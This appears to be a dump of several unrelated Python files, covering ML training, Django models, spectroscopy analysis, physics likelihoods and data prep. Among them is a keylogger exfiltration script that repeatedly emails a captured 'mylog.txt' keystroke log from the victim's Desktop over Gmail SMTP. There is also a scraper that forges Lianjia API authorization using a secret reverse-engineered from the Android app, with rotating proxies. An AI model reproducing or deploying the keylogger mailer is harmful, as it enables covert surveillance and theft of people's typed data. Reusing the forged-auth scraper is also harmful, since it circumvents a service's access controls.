with pytest.raises(AEAEnforceError):
envelope = Envelope(
to="some_address",
sender="me",
message=Mock(spec=Message),
)
await self.prometheus_con.channel.send(envelope)
# Test that envelope without dialogue produces warning.
msg = PrometheusMessage(
PrometheusMessage.Performative.RESPONSE, code=0, message=""
)
envelope = Envelope(
to=self.prometheus_address,
sender=self.some_skill,
message=msg,
)
await self.prometheus_con.channel.send(envelope)
# Test that envelope with invalid protocol_specification_id raises error.
with pytest.raises(ValueError):
msg, _ = self.dialogues.create(
counterparty=self.prometheus_address,
performative=PrometheusMessage.Performative.UPDATE_METRIC,
title="",
callable="",
value=1.0,
labels={},
)
envelope = Envelope(
to=self.prometheus_address,
sender=self.some_skill,
message=msg,
)
envelope._protocol_specification_id = "bad_id"
await self.prometheus_con.channel.send(envelope)
@pytest.mark.asyncio
async def test_disconnect(self):
"""Test disconnect."""
await self.prometheus_con.disconnect()
assert (
self.prometheus_con.state == ConnectionStates.disconnected
), "should be disconnected"
|
995,008 | 8ec4882d2ff2a65c6d1d492a7e2838b915805ec0 | from flask import Flask
def create_app():
app = Flask(__name__)
app.config.from_object("api.setting")
register_blueprint(app)
return app
def register_blueprint(app):
from api.web import web
app.register_blueprint(web) |
995,009 | f11901bc4966fa99dc9ee9db08798b77b861bb4b | from django.db import models
from django.utils import timezone
from datetime import timedelta
from django.contrib.auth.models import AbstractUser
import os
# Create your models here.
class UserProfile(AbstractUser):
gender = models.CharField(max_length=6, choices=(("male",u"male"),("female",u"female"),("secret", u"secret")), default="secret")
email = models.EmailField(null=True, blank=True)
remarks = models.CharField(max_length=500, null=True, blank=True)
address = models.CharField(max_length=100, default=u"")
class Meta(AbstractUser.Meta):
pass
def __str__(self):
return (self.username)
class Message(models.Model):
author = models.ForeignKey('UserProfile', related_name='Message_Author', on_delete=models.CASCADE)
receiver = models.ForeignKey('UserProfile', related_name='Message_Receiver', on_delete=models.CASCADE)
content = models.CharField(max_length=500, null=True, blank=True)
time = models.DateTimeField(default=timezone.now)
readflag = models.CharField(max_length=6, default='UNREAD')
remarks = models.CharField(max_length=500, null=True, blank=True)
def __str__(self):
return ('from %s to %s at %s:%s %s/%s/%s'
% (self.author, self.receiver, self.time.hour, self.time.minute, self.time.day, self.time.month,
self.time.year))
class Topic(models.Model):
title = models.CharField(max_length=100, null=True, blank=True)
content = models.CharField(max_length=500, null=True, blank=True)
time = models.DateTimeField(default=timezone.now)
author = models.ForeignKey('UserProfile', related_name='Topic_Author', on_delete=models.CASCADE,null=True,
blank=True)
remarks = models.PositiveIntegerField(default=0)
views = models.PositiveIntegerField(default=0)
def __str__(self):
return self.content
def increase_remarks(self):
self.remarks += 1
self.save(update_fields=['remarks'])
def increase_views(self):
self.views += 1
self.save(update_fields=['views'])
class Topiccomment(models.Model):
topic = models.ForeignKey('Topic', on_delete=models.CASCADE, null=True,
blank=True)
# comment = models.ForeignKey('self', on_delete=models.CASCADE, null=True,
# blank=True)
content = models.CharField(max_length=500, null=True, blank=True)
time = models.DateTimeField(default=timezone.now)
author = models.ForeignKey('UserProfile', related_name='TopicComment_Author', on_delete=models.CASCADE,null=True,
blank=True)
# remarks = models.CharField(max_length=500, null=True, blank=True)
def __str__(self):
return self.content
class News(models.Model):
title = models.CharField(max_length=100, null=True, blank=True)
content = models.CharField(max_length=10000, null=True, blank=True)
time = models.DateTimeField(default=timezone.now)
author = models.CharField(max_length=100, null=True, blank=True)
description = models.CharField(max_length=100, null=True, blank=True)
remarks = models.CharField(max_length=500, null=True, blank=True)
class NewsComment(models.Model):
topic = models.ForeignKey('News', on_delete=models.CASCADE, null=True,
blank=True)
content = models.CharField(max_length=500, null=True, blank=True)
time = models.DateTimeField(default=timezone.now)
author = models.ForeignKey('UserProfile', related_name='NewsComment_Author', on_delete=models.CASCADE,null=True,blank=True)
class Photo(models.Model):
photographer = models.ForeignKey('UserProfile', related_name='Photo_Author',
on_delete=models.CASCADE, null=True, blank=True)
image = models.ImageField(upload_to='images/album/', blank=True, null=True)
thumbs_up_number = models.IntegerField(null=False, blank=True, default=0)
category = models.CharField(max_length=20, null=True, blank=True, default="Landscape",
choices=(("1", u"Landscape"), ("2", u"Portraiture")))
time = models.DateTimeField(default=timezone.now)
photo_name = models.CharField(max_length=50, null=True, blank=True)
photographer_name = models.CharField(max_length=50, null=True, blank=True)
photographer_remark = models.CharField(max_length=500, null=True, blank=True)
def __unicode__(self):
return '%s %s' % (self.photo_name, self.image)
def increase_thumbs_up(self):
self.thumbs_up_number += 1
self.save(update_fields=['thumbs_up_number'])
def __str__(self):
return self.photo_name
class PhotoComment(models.Model):
author = models.ForeignKey('UserProfile', related_name='PhotoComment_Author',
on_delete=models.CASCADE, null=True)
photo = models.ForeignKey('Photo', related_name='PhotoID',
on_delete=models.CASCADE, null=True)
time = models.DateTimeField(default=timezone.now)
content = models.CharField(max_length=500, null=True, blank=True)
def __unicode__(self):
return '%s %s' % (self.photo, self.content)
def __str__(self):
return self.content |
995,010 | 1f5945c5f017f13695fc81e0c3adfda810db3750 | import numpy as np
from collections import deque
import random
from ActorCritic_network.actor_network import ActorNetwork
from ActorCritic_network.critic_network import CriticNetwork
REPLAY_MEMORY_SIZE = 300000 # play result = state of trade_board + selected action + reward + sign-off state
BATCH_SIZE = 256
GAMMA = 0.999
is_grad_inverter = False
class DDPG:
# Deep Deterministic Policy Gradient Algorithm
def __init__(self, session, currency, chart, timeline, length):
self.currency = currency
self.chart = chart
self.timeline = timeline
self.length = length
self.num_action = currency
self.critic_net = CriticNetwork(session, currency, chart, timeline, length)
self.actor_net = ActorNetwork(session, currency, chart, timeline, length)
# initialize buffer network:
self.replay_memory = deque()
# initialize time step:
self.time_step = 0
self.counter = 0
action_boundary = [[-1, 1]] * currency
def evaluate_actor(self, state_t):
return self.actor_net.evaluate_actor(state_t)
def add_experience(self, state, next_state, action, reward, terminal):
self.state = np.reshape(state, (self.currency * self.chart, self.timeline, self.length, 1))
self.next_state = np.reshape(next_state, (self.currency * self.chart, self.timeline, self.length, 1))
self.action = action
self.reward = reward
self.terminal = terminal
self.replay_memory.append((self.state, self.next_state, self.action, self.reward, self.terminal))
self.time_step = self.time_step + 1
if len(self.replay_memory) > REPLAY_MEMORY_SIZE:
self.replay_memory.popleft()
def minibatches(self):
batch = random.sample(self.replay_memory, BATCH_SIZE)
# state t
self.state_t_batch = [item[0] for item in batch]
self.state_t_batch = np.array(self.state_t_batch)
#self.state_t_batch = np.reshape(self.state_t_batch, (self.currency * self.chart, self.timeline, self.length, 1))
# state t+1
self.state_t_1_batch = [item[1] for item in batch]
self.state_t_1_batch = np.array(self.state_t_1_batch)
#self.state_t_1_batch = np.reshape(self.state_t_1_batch, (self.currency * self.chart, self.timeline, self.length, 1))
self.action_batch = [item[2] for item in batch]
self.action_batch = np.array(self.action_batch)
self.action_batch = np.reshape(self.action_batch, [len(self.action_batch), self.num_action]) # how define action_space?
self.reward_batch = [item[3] for item in batch]
self.reward_batch = np.array(self.reward_batch)
self.terminal_batch = [item[4] for item in batch]
self.terminal_batch = np.array(self.terminal_batch)
def train(self):
# sample a random minibatch of N transitions from R
self.minibatches()
self.action_t_1_batch = self.actor_net.evaluate_target_actor(self.state_t_1_batch)
# Q'(s_(i+1), a_(i+1))
q_t_1 = self.critic_net.evaluate_target_critic(self.state_t_1_batch, self.action_t_1_batch)
self.y_i_batch = []
for idx in range(BATCH_SIZE):
if self.terminal_batch[idx]:
self.y_i_batch.append(self.reward_batch[idx])
else:
self.y_i_batch.append(self.reward_batch[idx] + GAMMA * q_t_1[idx][0])
self.y_i_batch = np.array(self.y_i_batch)
self.y_i_batch = np.reshape(self.y_i_batch, [len(self.y_i_batch), 1])
# update critic by minimizing the loss
self.critic_net.train_critic(self.state_t_batch, self.action_batch, self.y_i_batch)
# update actor proportional to the gradients
action_for_deltaQ = self.evaluate_actor(self.state_t_batch)
self.deltaQ_a = self.critic_net.compute_deltaQ_a(self.state_t_batch, action_for_deltaQ)[0]
# train actor network proportional to deltaQ/delta_a and delta_actor_model/delta_actor_parameters:
self.actor_net.train_actor(self.state_t_batch, self.deltaQ_a)
# update target critic and actor network
self.critic_net.update_target_critic()
self.actor_net.update_target_actor()
|
995,011 | beba2e17ae94c52dde16da9678166fa14b59740b | import pickle
#direct = '/Users/heine2307/Documents/Universitet/UiO/Master/GitHub/VQE/quantum_algorithms/attributes/'
direct = '/home/heineaabo/Documents/UiO/Master/VQE/quantum_algorithms/attributes/'
#def QuantumComputer(device,noise_model,coupling_map,basis_gates=False):
# name = device
# if device == None:
# return None,None,None
# else:
# if noise_model:
# noise_model = pickle.load(open(direct+'noise_models/'+device+'.pkl','rb'))
# if coupling_map:
# coupling_map = pickle.load(open(direct+'coupling_maps/'+device+'.pkl','rb'))
# if basis_gates:
# basis_gates = pickle.load(open(direct+'basis_gates/'+device+'.pkl','rb'))
# return noise_model,coupling_map,basis_gates
class QuantumComputer:
def __init__(self,name):
self.name = name
self.noise_model = pickle.load(open(direct+'noise_models/'+name+'.pkl','rb'))
self.coupling_map = pickle.load(open(direct+'coupling_maps/'+name+'.pkl','rb'))
self.basis_gates = pickle.load(open(direct+'basis_gates/'+name+'.pkl','rb'))
|
995,012 | 83b594f4c36e9613d1be819bb0b36f36be3341c9 | from FTIR_show import getdata
from FTIR_Pretreatment import mean_centralization,standardlize,sg,msc,snv,D1,D2
from sklearn.decomposition import PCA
from statsmodels.stats.outliers_influence import variance_inflation_factor
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import Lasso,LassoCV,LassoLarsCV
from sklearn.manifold import TSNE
from mpl_toolkits.mplot3d import Axes3D
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
from sklearn import svm
import sklearn
import numpy as np
import pandas as pd
np.set_printoptions(threshold=10000) # 显示多少行
np.set_printoptions(linewidth=100) # 横向多宽
# #######Read in data
# DATA_2B_dir = 'D://正常细胞与癌细胞分类//光谱法//实验数据//FTIR//FTIR总数据//2B//'
# DATA_A549_dir = 'D://正常细胞与癌细胞分类//光谱法//实验数据//FTIR//FTIR总数据//A549//'
# DATA_2B = getdata(DATA_2B_dir)
# DATA_A549 = getdata(DATA_A549_dir)
# #Merge into a data set
# FTIR_DATA = pd.merge(DATA_2B,DATA_A549,on='wave')
# FTIR_DATA = FTIR_DATA.T
# #Create label, 0 means 2B, 1 means A549
# Label = [0 for i in range(DATA_2B.shape[1]-1)] + [1 for i in range(DATA_A549.shape[1]-1)]
# Label = np.array(Label)
# # print(len(Label))
#######sg+msc+snv
# st_absorb = standardlize(absorb)
# D2_absorb = D2(st_absorb)
########dimention reduce
def dim_pca(absorb):
pca = PCA(n_components=3)
absorb_pca = pca.fit_transform(absorb)
return absorb_pca
def dim_tsne(absorb):
'''
Enter the original data and return the data after tsne dimensionality reduction
'''
tsne = TSNE(perplexity=30, n_components=3, init='pca', n_iter=5000, learning_rate=500)
absorb_tsne = tsne.fit_transform(absorb)
return absorb_tsne
def vif(x, thres=10.0):
'''
每轮循环中计算各个变量的VIF,并删除VIF>threshold 的变量
'''
X_m = np.matrix(x)
VIF_list = [variance_inflation_factor(X_m, i) for i in range(X_m.shape[1])]
maxvif=pd.DataFrame(VIF_list,index=x.columns,columns=["vif"])
col_save=list(maxvif[maxvif.vif<=float(thres)].index)
col_delete=list(maxvif[maxvif.vif>float(thres)].index)
print(len(col_delete))
print(maxvif)
print('delete Variables:', col_delete)
return x[col_save]
def rmse_cv(model):
rmse= np.sqrt(-cross_val_score(model, train_data, train_label, scoring="neg_mean_squared_error", cv = 10))
return(rmse)
def Lasso_select(wave_name,absorb,Label,save_dir):
'''
输出系数不为0的波长
'''
############lasso
#图片保存路径
# save_dir = 'D://正常细胞与癌细胞分类//光谱法//实验数据//FTIR//FTIR总数据//预处理测试结果//'
#数据集划分
train_data,test_data,train_label,test_label = sklearn.model_selection.train_test_split(absorb,Label, random_state=1,train_size=0.9,test_size=0.1)
#将特征放缩到(-1,1)
# min_max_scaler = MinMaxScaler(feature_range=(-1, 1))
# train_data = min_max_scaler.fit_transform(train_data)
# test_data = min_max_scaler.transform(test_data)
#调用LassoCV函数,并进行交叉验证,cv=10
model_lasso = LassoCV(alphas = [1, 0.1, 0.01, 0.001, 0.0005], cv=10).fit(train_data, train_label)
#模型所选择的最优正则化参数alpha
print(model_lasso.alpha_)
#各特征列的参数值或者说权重参数,为0代表该特征被模型剔除了
# print(model_lasso.coef_)
#输出看模型最终选择了几个特征向量,剔除了几个特征向量
coef = pd.Series(model_lasso.coef_, index = train_data.columns)
print("Lasso picked " + str(sum(coef != 0)) + " variables and eliminated the other " + str(sum(coef == 0)) + " variables")
#输出所选择的最优正则化参数情况下的残差平均值,因为是10折,所以看平均值
# print(rmse_cv(model_lasso).mean())
#画出特征变量的重要程度
Lasso_picked_var = []
var_coef = []
for index,value in coef.items():
if value != 0:
Lasso_picked_var.append(index)
var_coef.append(value)
#波长名
# wave_name = np.array(FTIR_DATA.iloc[0,:])
# wave_name = np.array(list(map(lambda x: "%.4f" % x , wave_name)))
plt.figure(dpi=300)
plt.rcParams['axes.unicode_minus'] =False
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.bar(wave_name[Lasso_picked_var],var_coef)
plt.tick_params(labelsize=4)
plt.title("Coefficients in the Lasso Model")
plt.savefig(save_dir + 'Lasso_var'+'.jpg')
plt.show()
# #选择波长分布
# plt.figure()
# plt.plot(wave_name,absorb.iloc[0, :])
# plt.scatter(wave_name[Lasso_picked_var], absorb.loc[0, Lasso_picked_var], marker='s', color='r')
# plt.title('Lasso')
# plt.legend(['First calibration object', 'Selected variables'])
# plt.xlabel('Variable index')
# plt.grid(True)
# plt.savefig(save_dir + 'Lasso_1'+'.jpg')
# plt.show()
#输出系数不为0的波长
print(wave_name[Lasso_picked_var])
return Lasso_picked_var
# absorb = FTIR_DATA.iloc[1:]
# result = Lasso_select(FTIR_DATA,absorb,Label)
# print(result)
########PCA
# candidate_components = range(1, 30, 1)
# explained_ratios = []
# for c in candidate_components:
# pca = PCA(n_components=c)
# X_pca = pca.fit_transform(st_absorb)
# explained_ratios.append(np.sum(pca.explained_variance_ratio_))
# plt.figure(figsize=(10, 6), dpi=144)
# plt.grid()
# plt.plot(candidate_components, explained_ratios)
# plt.xlabel('Number of PCA Components')
# plt.ylabel('Explained Variance Ratio')
# plt.title('Explained variance ratio for PCA')
# plt.yticks(np.arange(0.5, 1.05, .05))
# plt.xticks(np.arange(0, 30, 1))
# plt.show()
# scatter
# absorb_tsne = dim_tsne(absorb)
# fig = plt.figure()
# ax = Axes3D(fig)
# ax.scatter(absorb_tsne[:,0], absorb_tsne[:,1], absorb_tsne[:,2])
# plt.show()
# plt.figure()
# plt.scatter(absorb_tsne[:,0],absorb_tsne[:,1])
# plt.show() |
995,013 | 467d1211af0f6f1bb878156cb48cec3ad5271d79 | # -*- coding: utf-8 -*-
import time
import base64
import hashlib
import json
import sys
import os
sys.path.append(os.path.abspath(os.path.join(sys.argv[0], "../../..")))
from spider.generate_excle import generate_excle
from zaishou_data_analysis import zaishou_data_analysis
from zaishou_constant import zaishou_constant
from spider.AgentAndProxies import GetIpProxy
class zaishou:
def __init__(self):
# 爬取页数
self.count = 21
# 一页一共多少数据
self.limit_count = 100
# 第几页(页数*一页一共多少数据)
self.limit_offset = -100
# 当前时间
self.request_ts = 0
# 当前是第几页 从第0页开始
self.current_page = 0
# 由android JNI逆向得出的链家apk秘钥
# self.Authorization = '93273ef46a0b880faf4466c48f74878fcity_id=110000limit_count=10limit_offset=0request_ts=1511232061'
# 在线数据只需要Authorization认证
self.headers = {
# 'Page-Schema': 'tradedSearch%2Flist',
# 'Referer': 'homepage%3F',
# 'Cookie': 'lianjia_udid=6fc5da9bec827948;lianjia_token=2.007d00a43c04bd8bd26cad8d0d82a4302c;lianjia_ssid=a3c137a9-c77c-438a-a6c0-27c160707d7c;lianjia_uuid=39d20bd7-28a5-4ffa-bbac-dd70d6eaf2cd',
# 'Lianjia-Access-Token': '2.007d00a43c04bd8bd26cad8d0d82a4302c',
# 'User-Agent': 'HomeLink8.2.1;generic Custom+Phone+-+5.0.0+-+API+21+-+768x1280; Android 5.0',
# 'Lianjia-Channel': 'Android_Anzhi',
# 'Lianjia-Device-Id': '6fc5da9bec827948',
# 'Lianjia-Version': '8.2.1',
'Authorization': '93273ef46a0b880faf4466c48f74878fcity_id=110000limit_count=10limit_offset=0request_ts=1511232061',
# 'Lianjia-Im-Version': '2.4.4',
# 'Host': 'app.api.lianjia.com',
# 'Connection': 'Keep-Alive',
# 'Accept-Encoding': 'gzip'
}
self.zaishou_data_analysis = zaishou_data_analysis()
self.GetIpProxy = GetIpProxy()
def start(self):
self.excle_init_title()
for i in range(self.count):
self.current_page = i
# time.sleep(1)
self.request_url_list()
# 完成循环后保存excle
self.generate_excle.saveExcle('zaishou.xls')
def request_url_list(self):
self.limit_offset = self.limit_offset + self.limit_count
self.request_ts = int(time.time())
source_Authorization = '93273ef46a0b880faf4466c48f74878fcity_id=110000limit_count=' + str(
self.limit_count) + 'limit_offset=' + str(self.limit_offset) + 'request_ts=' + str(self.request_ts)
source_Authorization = '93273ef46a0b880faf4466c48f74878fareaRequest=city_id=110000communityRequset=' \
'comunityIdRequest=condition=has_recommend=1isFromMap=falseis_history=0is_suggestion=0limit_count=' + str(
self.limit_count) + 'limit_offset=' + str(self.limit_offset) + 'moreRequest=priceRequest=request_ts=' + str(
self.request_ts) + 'roomRequest=schoolRequest=sugQueryStr='
# print source_Authorization
self.generate_authorization(source_Authorization)
url = 'https://app.api.lianjia.com/house/ershoufang/searchv4?city_id=110000&priceRequest=&limit_offset=' + str(
self.limit_offset) + '&moreRequest=&communityRequset=&has_recommend=1&is_suggestion=0&limit_count=' + str(
self.limit_count) + '&sugQueryStr=&comunityIdRequest=&areaRequest=&' \
'is_history=0&schoolRequest=&condition=&roomRequest=&isFromMap=false&request_ts=' + str(
self.request_ts)
# print headers.get('Authorization')
print(url)
try:
self.get_result_json_list(url)
except Exception as e:
pass
def get_result_json_list(self, url):
# 替换代理模式
# result_list = requests.get(url, headers=self.headers)
result_list = self.GetIpProxy.requestUrlForRe(url, self.headers)
# print result_list.text
jsonsource = json.loads(result_list.text, encoding='utf-8')
if jsonsource["data"]['list'] is not None:
for index in range(len(jsonsource["data"]['list'])):
# print jsonsource["data"]['list']
self.request_ts = int(time.time())
zaishou_pruduct_url_authorization = '93273ef46a0b880faf4466c48f74878fagent_type=1house_code=' + str(
jsonsource["data"]['list'][index]['house_code']) + 'request_ts=' + str(self.request_ts)
# 生成证书认证
self.generate_authorization(zaishou_pruduct_url_authorization)
zaishou_pruduct_url = 'https://app.api.lianjia.com/house/ershoufang/detailpart1?house_code=' + str(
jsonsource["data"]['list'][index]['house_code']) + '&agent_type=1&request_ts=' + str(
self.request_ts)
# 替换代理模式
# result_product = requests.get(zaishou_pruduct_url, headers=self.headers)
result_product = self.GetIpProxy.requestUrlForRe(zaishou_pruduct_url, self.headers)
# print result_product.text
product_json = json.loads(result_product.text, encoding='utf-8')
self.zaishou_data_analysis.zaishou_product(product_json['data'])
# 获取更多
self.request_ts = int(time.time())
zaishou_pruduct_more_authorization = '93273ef46a0b880faf4466c48f74878fhouse_code=' + str(
jsonsource["data"]['list'][index]['house_code']) + 'request_ts=' + str(self.request_ts)
# 生成证书认证
self.generate_authorization(zaishou_pruduct_more_authorization)
zaishou_product_more_url = 'https://app.api.lianjia.com/house/house/moreinfo?house_code=' + str(
jsonsource["data"]['list'][index]['house_code']) + '&request_ts=' + str(self.request_ts)
# 替换代理模式
# result_product_more = requests.get(chengjiao_more_url, headers=self.headers)
result_product_more = self.GetIpProxy.requestUrlForRe(zaishou_product_more_url, self.headers)
product_json_more = json.loads(result_product_more.text, encoding='utf-8')
if self.current_page == 0:
row = index + self.current_page * self.limit_count
else:
row = index + self.current_page * self.limit_count + 10
print 'row:' + str(row) + ' url:' + zaishou_pruduct_url
self.zaishou_data_analysis.zaishou_product_moire(product_json_more, row, self.generate_excle)
# print result_product_more.text
def generate_authorization(self, str):
sha1 = hashlib.sha1(str).hexdigest()
temp = '20170324_android:' + sha1
Authorization = base64.b64encode(temp)
self.headers['Authorization'] = Authorization
def excle_init_title(self):
self.generate_excle = generate_excle()
self.generate_excle.addSheetExcle('zaishou')
self.zaishou_constant = zaishou_constant();
for itemKey in self.zaishou_constant.zaishou_source_data.keys():
self.generate_excle.writeExclePositon(0, self.zaishou_constant.zaishou_source_data.get(itemKey),
itemKey)
zaishou = zaishou()
zaishou.start()
|
995,014 | 429d89ba407bfbecea3efcf975fd3ff359d030dd | # this file, along with actpols2_like_py.data, allows you
# to use this likelihood for Monte Python.
#
import os
import numpy as np
from montepython.likelihood_class import Likelihood
import pyactlike # our likelihood
class ACTPol_lite_DR4(Likelihood):
# initialization routine
def __init__(self, path, data, command_line):
Likelihood.__init__(self, path, data, command_line)
self.need_cosmo_arguments(
data,
{
"lensing": "yes",
"output": "tCl lCl pCl",
"l_max_scalars": 6000,
"modes": "s",
},
)
self.need_update = True
self.use_nuisance = ["yp2"]
self.nuisance = ["yp2"]
self.act = pyactlike.ACTPowerSpectrumData()
# \ell values 2, 3, ... 6000
self.xx = np.array(range(2, 6001))
# compute likelihood
def loglkl(self, cosmo, data):
# print "STARTING LIKELIHOOD------------ ", data.cosmo_arguments
lkl = 0.0
try:
# call CLASS
cl = self.get_cl(cosmo, 6000)
# we follow the convention of operating with (l(l+1)/2pi) * C_l
ee = cl["ee"][2:]
te = cl["te"][2:]
tt = cl["tt"][2:]
tt = (self.xx) * (self.xx + 1) * tt / (2 * np.pi)
te = (self.xx) * (self.xx + 1) * te / (2 * np.pi)
ee = (self.xx) * (self.xx + 1) * ee / (2 * np.pi)
yp = data.mcmc_parameters["yp2"]["current"]
lkl = self.act.loglike(tt, te, ee, yp)
except:
lkl = -np.inf
return lkl
|
995,015 | 713952565b8722cc7e730cb2c195b4df7400df33 | import pandas as pd
import numpy as np
import sys
import os
directory= sys.argv[1]
df=pd.read_csv('./{}/dataset_{}.csv'.format(directory, directory), sep=';')
classifications= pd.read_csv('./{}/classifications.csv'.format(directory), sep=';')
df=pd.merge(df, classifications, on='SMILES')
df.to_csv('./{}/data_classified.csv'.format(directory), sep=';', index=False)
df2 = df[df['SMILES'].notna()]
df3 = df2.drop_duplicates('SMILES')
#print(df3)
#---------------- CSS Base ---------------
adduct= np.repeat('All', df3.shape[0])
data_ccsbase=np.column_stack((adduct, df3.SMILES, df3.SMILES))
column_values_ccsbase = ['Adduct','Smiles','Name']
ccsbase = pd.DataFrame(data = data_ccsbase,
columns = column_values_ccsbase)
#print(ccsbase)
if not os.path.exists('./{}/ccsbase'.format(directory)):
os.makedirs('./{}/ccsbase'.format(directory))
ccsbase.to_csv('./{}/ccsbase/dataccsbase.csv'.format(directory), index=False)
#---------------- All CCS ----------------
number= np.arange(df3.shape[0])
data_allccs= np.column_stack((number, df3.SMILES))
allccs= pd.DataFrame(data = data_allccs)
#print(allccs)
if not os.path.exists('./{}/allccs'.format(directory)):
os.makedirs('./{}/allccs'.format(directory))
allccs.to_csv('./{}/allccs/dataallccs.csv'.format(directory), index=False, header=None)
#---------------- Dark Chem ----------------
data_darkchem= df3.SMILES
darkchem = pd.DataFrame(data = df3.SMILES)
darkchem= darkchem.rename(columns={'SMI': 'SMILES'})
#print(darkchem)
if not os.path.exists('./{}/darkchem'.format(directory)):
os.makedirs('./{}/darkchem'.format(directory))
darkchem.to_csv('./{}/darkchem/datadarkchem.tsv'.format(directory), sep='\t', index=False)
#---------------- Deep CCS ----------------
df4=df3.loc[df3.index.repeat(4)]
#print(original_deepccs)
add=np.array(["M+H", "M+Na", "M-H", "M-2H"])
adducts=np.tile(add,len(df4)//4)
df4['Adducts']=adducts
#print(original_deepccs)
data_deepccs=np.column_stack((df4.SMILES, df4.Adducts))
column_values_deepccs = ['SMILES','Adducts']
deepccs = pd.DataFrame(data = data_deepccs,
columns = column_values_deepccs)
#print(deepccs)
if not os.path.exists('./{}/deepccs'.format(directory)):
os.makedirs('./{}/deepccs'.format(directory))
deepccs.to_csv('./{}/deepccs/datadeepccs.csv'.format(directory), index=False)
|
995,016 | ccdd99a98e373f609d1ebc54fc2891ffe2dc3d61 | #파이r^2
cir_r=int(input("반지름을 입력해주세요: "))
pai=3.14
cir_a=pai*((cir_r)**2)
print("원의 넓이는",cir_a,"이다.") |
995,017 | be0d9ea28d740d52a06ef7a0ec0bb5263643c75c | from pynput.keyboard import Listener
import logging, time
from shutil import copyfile
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
EMAIL_ADDRESS = os.environ.get("DEVMAIL_ADDRESS")
EMAIL_PASSWORD = os.environ.get("DEVMAIL_PASSWORD")
def send_mail():
username = os.getlogin()
subject = 'keylog Data'
msg = MIMEMultipart()
msg['From'] = EMAIL_ADDRESS
msg['To'] = EMAIL_ADDRESS
msg['Subject'] = subject
body = 'Here, is the logging data that you kept on check!'
msg.attach(MIMEText(body,'plain'))
filename = 'mylog.txt'
attachment = open(f"C:/Users/{username}/Desktop/{filename}",'rb')
part = MIMEBase('application', 'octet-stream')
part.set_payload(attachment.read())
encoders.encode_base64(part)
part.add_header('Content-Disposition','attachment; filename= '+filename)
msg.attach(part)
text = msg.as_string()
server = smtplib.SMTP('smtp.gmail.com',587)
server.ehlo()
server.starttls()
server.ehlo()
server.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
server.sendmail(EMAIL_ADDRESS,EMAIL_ADDRESS,text)
print('Hey Email Has Been Sent')
server.quit()
while(True):
time.sleep(30)
send_mail()
|
995,018 | a483432731cfcc537d0b60f0552dd12a5ce7bad9 | #!/usr/bin/env python3
import pathlib
import re
import shutil
import sys
from textwrap import dedent
import ply.lex
def get_deps_file():
# TODO recover actual builddir
with open('./latexmkrc', 'r') as f:
lines = f.readlines()
for line in lines:
if 'deps_file' in line:
pass
return pathlib.Path('.', 'build', 'deps')
def find_matching_deps(depsfile: pathlib.Path):
deps = []
# open deps file and find matches
with depsfile.open('r') as f:
# skip two lines
for _ in range(2):
f.readline()
while True:
line = f.readline().strip()
if line.startswith('#===End'):
break
if line[0] != '/':
deps.append(remove_trailing_backslash(line))
return deps
def remove_trailing_backslash(s):
if s[-1] == '\\':
return s[:-1]
else:
return s
def strip_comments(source):
"""Strip comments from LaTeX source files
Adapated from:
<https://tex.stackexchange.com/a/214637> by Adam Merberg
"""
tokens = (
'PERCENT',
'BEGINCOMMENT', 'ENDCOMMENT',
'BACKSLASH',
'CHAR',
'BEGINVERBATIM', 'ENDVERBATIM',
'BEGINLISTING', 'ENDLISTING',
'NEWLINE',
'ESCPCT',
)
states = (
('linecomment', 'exclusive'),
('commentenv', 'exclusive'),
('verbatim', 'exclusive'),
('listing', 'exclusive'),
)
#Deal with escaped backslashes, so we don't think they're escaping %.
def t_BACKSLASH(t):
r"\\\\"
return t
#One-line comments
def t_PERCENT(t):
r"\%"
t.lexer.begin("linecomment")
return None
#Escaped percent signs
def t_ESCPCT(t):
r"\\\%"
return t
#Comment environment, as defined by verbatim package
def t_BEGINCOMMENT(t):
r"\\begin\s*{\s*comment\s*}"
t.lexer.begin("commentenv")
return None
#Verbatim environment (different treatment of comments within)
def t_BEGINVERBATIM(t):
r"\\begin\s*{\s*verbatim\s*}"
t.lexer.begin("verbatim")
return t
#Listings environment (different treatment of comments within)
def t_BEGINLISTING(t):
r"\\begin\s*{\s*lstlisting\s*}"
t.lexer.begin("listing")
return t
#Any other character in initial state we leave alone
def t_CHAR(t):
r"."
return t
def t_NEWLINE(t):
r"\n"
return t
#End comment environment
def t_commentenv_ENDCOMMENT(t):
r"\\end\s*{\s*comment\s*}"
#Anything after \end{comment} on a line is ignored!
t.lexer.begin('linecomment')
return None
#Ignore comments of comment environment
def t_commentenv_CHAR(t):
r"."
return None
def t_commentenv_NEWLINE(t):
r"\n"
return None
#End of verbatim environment
def t_verbatim_ENDVERBATIM(t):
r"\\end\s*{\s*verbatim\s*}"
t.lexer.begin('INITIAL')
return t
#End of listing environment
def t_listing_ENDLISTING(t):
r"\\end\s*{\s*lstlisting\s*}"
t.lexer.begin('INITIAL')
return t
#Leave contents of verbatim/listing environment alone
def t_verbatim_listing_CHAR(t):
r"."
return t
def t_verbatim_listing_NEWLINE(t):
r"\n"
return t
#End a % comment when we get to a new line
def t_linecomment_ENDCOMMENT(t):
r"\n"
t.lexer.begin("INITIAL")
#Newline at the end of a line comment is stripped.
return None
#Ignore anything after a % on a line
def t_linecomment_CHAR(t):
r"."
return None
#Print errors
def t_ANY_error(t):
print(t.value, file=sys.stderr)
lexer = ply.lex.lex()
lexer.input(source)
return u"".join([tok.value for tok in lexer])
def main():
# make arxiv dir
arxivdir = pathlib.Path('.', 'arxiv')
# open deps file and find matches
depsfile = get_deps_file()
deps = find_matching_deps(depsfile)
assert deps
# copy matches to new subdirectory
for dep in deps:
src = pathlib.Path(dep)
dst = arxivdir.joinpath(dep)
dst.parent.mkdir(parents=True, exist_ok=True)
shutil.copyfile(src, dst)
# create makefile
with arxivdir.joinpath('Makefile').open('w') as f:
f.write(dedent('''\
.PHONY: main
main:
\tlatexmk -shell-escape -bibtex -pdf main
.PHONY: clean
clean:
\tlatexmk -C main
'''))
# remove comments from all files
for dep in deps:
p = arxivdir.joinpath(dep)
if p.suffix != '.tex':
print(f'Skipping {p}')
continue
print(f'Stripping comments from {p}...')
with p.open('r') as f:
content = f.read()
content = strip_comments(content)
with p.open('w') as f:
f.write(content)
if __name__ == '__main__':
main()
|
995,019 | 59ae063f57bb33470c1ab806bcb3cf67db295825 | # import sklearn
# import matplotlib.pyplot as plt
# import random
# import re
